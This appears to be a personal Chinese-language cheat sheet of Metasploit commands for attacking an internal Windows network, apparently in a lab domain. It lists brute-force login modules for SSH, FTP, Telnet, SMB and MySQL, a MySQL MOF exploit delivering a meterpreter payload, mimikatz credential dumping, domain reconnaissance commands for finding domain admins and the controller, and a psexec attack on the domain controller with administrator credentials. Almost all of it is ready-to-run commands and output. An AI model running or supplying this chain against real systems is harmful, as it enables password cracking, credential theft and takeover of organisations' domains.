Msf:
写的很乱 记录下msf各个爆破弱口令的模块
run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使用arp_scanner模块 检测在线主机
metasploit 增加路由
route add 10.10.1.3 255.255.255.0 1
使用扫描模块
use scanner/portscan/tcp
爆破ssh
Msf>use auxiliary/scanner/ssh/ssh_login
爆破ftp
Msf>use auxiliary/scanner/ftp/ftp_login
爆破telnet
Msf>use auxiliary/scanner/telnet/telnet_login
爆破smb
auxiliary/scanner/smb/smb_login
爆破Mysql
use scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/passlist.txt
PASS_FILE => /root/passlist.txt
使用mof模块进行权限获取
use windows/mysql/mysql_mof
msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456
PASSWORD => 123456
msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3
rhost => 10.10.1.3
msf exploit(windows/mysql/mysql_mof) > set USERNAME root
USERNAME => root
msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/mysql/mysql_mof) > exploit
Mimikatz导出hash
meterpreter > load mimikatz
meterpreter > kerberos
一些域内的命令
查看域
net view /domain
查看当前域中的计算机
net view
查看CORP域中的计算机
net view /domain:CORP
Ping计算机名可以得到IP
ping Wangsong-PC
获取所有域的用户列表
net user /domain
获取域用户组信息
net group /domain
获取当前域管理员信息
net group "domain admins" /domain
查看域时间及域服务器的名字
net time /domain
net time /domain 就可以知道域的计算机名
WIN-723O786H6KU.moonsec.com 10.10.1.2 这个就是域控
net group "domain admins" /domain
反弹shell
msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2
RHOST => 10.10.1.2
msf exploit(windows/smb/psexec) > set SMBDomain moonsec
SMBDomain => moonsec
msf exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(windows/smb/psexec) > set SMBPass xxx123456..
SMBPass => xxx123456..
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > exploit